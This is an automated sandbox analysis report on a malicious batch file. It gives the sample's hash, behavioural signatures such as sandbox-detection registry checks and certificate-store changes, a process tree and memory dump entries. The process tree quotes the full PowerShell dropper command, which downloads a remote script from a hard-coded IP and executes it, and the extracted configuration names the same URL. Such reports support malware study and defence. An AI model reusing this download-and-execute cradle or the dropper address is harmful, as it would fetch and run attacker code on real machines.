Analysis

  • max time kernel
    134s
  • resource
    win10v191014
  • submitted
    16-12-2019 11:10

General

  • Target

    SbbpUVLZ.bat

  • Sample

    191216-sww42m789e

  • SHA256

    600cfe34a4db54318db70d3cc036a50e63d7b7bb50f7f3983de8ef03c9f5d718

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/SbbpUVLZ

Signatures

  • Program crash 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs
  • Windows security modification 2 TTPs 2 IoCs
  • Checks for installed software on the system 1 TTPs 63 IoCs
  • Checks system information in the registry 2 TTPs 2 IoCs

    System information is often read in order to detect sandboxing environments.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SbbpUVLZ.bat"
    1⤵
      PID:4888
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/SbbpUVLZ');Invoke-DJXLPJNRKFPDUKT;Start-Sleep -s 10000"
        2⤵
          PID:4932
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 704
            3⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5064
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k WerSvcGroup
        1⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious behavior: EnumeratesProcesses
        PID:5032
      • \??\c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s WdiSystemHost
        1⤵
          PID:5096
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
          1⤵
            PID:1996
          • \??\c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
            1⤵
              PID:1820
            • C:\Windows\system32\SppExtComObj.exe
              C:\Windows\system32\SppExtComObj.exe -Embedding
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:4560
              • C:\Windows\System32\SLUI.exe
                "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                2⤵
                  PID:1804
              • \??\c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s wisvc
                1⤵
                  PID:3848
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                  1⤵
                  • Drops file in Windows directory
                  PID:3056
                • \??\c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
                  1⤵
                    PID:4144
                  • \??\c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s DoSvc
                    1⤵
                      PID:4492
                    • \??\c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s wscsvc
                      1⤵
                        PID:4848
                      • \??\c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k unistacksvcgroup
                        1⤵
                          PID:4000

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC16B.tmp.csv

                        • C:\ProgramData\Microsoft\Windows\WER\Temp\WERC18B.tmp.txt

                        • memory/3056-37-0x0000019374DC0000-0x0000019374DC1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-18-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-10-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-5-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-6-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-19-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-8-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-9-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-20-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-11-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-21-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-14-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-13-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-15-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-16-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-17-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-0-0x0000000005050000-0x0000000005051000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-7-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-4-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-12-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-22-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-23-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-24-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-25-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-26-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-27-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-28-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-29-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-30-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-31-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-32-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-33-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-2-0x00000000034C0000-0x00000000034C1000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-3-0x0000000005900000-0x0000000005901000-memory.dmp

                          Filesize

                          4KB

                        • memory/5064-1-0x0000000005810000-0x0000000005811000-memory.dmp

                          Filesize

                          4KB